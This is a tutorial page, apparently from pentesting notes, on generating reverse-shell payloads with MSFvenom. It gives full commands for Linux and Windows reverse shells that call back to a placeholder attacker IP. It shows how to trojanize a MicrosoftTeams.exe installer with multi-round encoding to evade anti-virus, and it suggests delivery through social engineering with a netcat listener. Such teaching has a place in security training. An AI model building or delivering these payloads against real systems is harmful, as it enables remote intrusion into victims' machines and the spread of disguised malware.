Skip to main content

MSFvenom

This section will cover ways to use MSFvenom.

Table of Contents
  • Overview
  • Usage
    • Staged Payloads
    • Stageless Payloads
  • Creating a Stageless Payload
  • Defence Evasion
  • Post Creation

Overview

MSFvenom allows us to create payloads to spawn a reverse shell on our target to get remote shell access.

In addition to creating payloads, we can also encrypt and encode the payloads to bypass common anti-virus signatures.

Usage

We can use the following command to list all available payloads.

msfvenom -l payload

msfvenom1.png

We can see that the payloads are divided into multiple categories from the operating system and if the payload is staged or stageless.

To identify if a payload is staged or stageless, we can look at its name. Consider the two payloads:

linux/x86/shell/reverse_tcp
linux/zarch/meterpreter_reverse_tcp

The first payload is staged which can be identified by the slash (/) in /shell/ before the reverse_tcp. This indicates that the /shell/ is a stage, and /reverse_tcp is another.

The second payload is stageless. Instead of spitting the payload, it will send the whole payload (/meterpreter_reverse_tcp) in a single stage.

The below payloads will be another example of staged and stageless respectively.

windows/meterpreter/reverse_tcp
windows/meterpreter_reverse_tcp

Staged Payloads

Staged payloads allow us to send over more components of our attack. An example will be using the linux/x86/shell/reverse_tcp payload. When running this module, the payload will send a small stage that will be executed on the target.

Once executed, it will then call back to the attacker's machine to download the rest of the payload before executing the shellcode to establish a reverse shell.

Stageless Payloads

Stageless payloads do not have a stage. An example will be the linux/zarch/meterpreter_reverse_tcp module. The payload will be sent in its entirety without a stage. This can benefit us in an environment where we do not have access to a high bandwidth and latency can interfere.

Staged payloads can lead to a unstable shell sessions in such environments. This is where stageless comes in.

Stageless payloads can also offer better evasion purposes due to less traffic passing over the network to execute the payload.

Creating a Stageless Payload

To create a stageless payload, we can use the following command. This example will create a reverse shell for a x64 Linux system.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ATTACKER IP> LPORT=<ATTACKER PORT> -f elf > linux-reverse.elf

Command breakdown:

  • -p linux/x64/shell_reverse_tcp - Specify the payload to use.
  • LHOST=<ATTACKER IP> - Specify the attacker's IP address.
  • LPORT=<ATTACKER PORT> - Specify the port that the attacker will be listening on for a connection.
  • -f elf - Specify the file extension.
  • > linux-reverse.elf - Specify to send the output into the specified file.

Another example will be for a Windows target using the windows/shell_reverse_tcp payload.

msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER IP> LPORT=<ATTACKER PORT> -f exe > windows-reverse-shell.exe

Command breakdown:

  • -p windows/shell_reverse_tcp - Specify the payload to use.
  • LHOST=<ATTACKER IP> - Specify the attacker's IP address.
  • LPORT=<ATTACKER PORT> - Specify the port that the attacker will be listening on for a connection.
  • -f exe - Specify the file extension.
  • > windows-reverse-shell.exe - Specify to send the output into the specified file.

Defence Evasion

We can use the -x switch and specify the file we want to embed our payload in and -e to select an encoding method. This potentially allows us to bypass any defences such as an anti-virus or IPS.

msfvenom -p payload/to/use/here LHOST=<ATTACKER IP> LPORT=<ATTACKER PORT> -k -x path/to/file/to/embed_in -e <encoding method> -a <architecture> -i <encoding rounds>

Command breakdown:

  • -p payload/to/use/here - Specify the payload to use.
  • LHOST=<ATTACKER IP> - Specify the attacker's IP address.
  • LPORT=<ATTACKER PORT> - Specify the port that the attacker is listening on.
  • -k - Specify to keep the template's original entry point.
  • -x path/to/file/to/embed_in - Specify the file to embed the payload into.
  • -e <encoding method> - Specify the encoding method to use.
  • -a <architecture> - Specify the architecture of the payload.
  • -i <encoding rounds> - Specify how many rounds of encoding is applied.

An example will be:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER IP> LPORT=<ATTACKER PORT> -k -x ~/Downloads/MicrosoftTeams.exe -e x64/shikata_ga_nai -a x64 -i 5

Command breakdown:

  • -p windows/x64/shell_reverse_tcp - Specify the payload to use.
  • LHOST=<ATTACKER IP> - Specify the attacker's IP address.
  • LPORT=<ATTACKER PORT> - Specify the port that the attacker is listening on.
  • -k - Specify to keep the template's original entry point.
  • -x ~/Downloads/MicrosoftTeams.exe - Specify the file to embed the payload into.
  • -e x64/shikata_ga_nai - Specify the encoding method to use.
  • -a x64 - Specify the architecture of the payload.
  • -i 5 - Specify how many rounds of encoding is applied.

Another methods can include archiving the payload (.rar, .7z, .zip) and password protecting it.

Post Creation

After the payload has been created, we can send it over to the target via different means such as social engineering or exploiting a vulnerability to upload the file.

We will need to have a listener such as netcat (nc) to listen on the port specified in LPORT when creating the payload.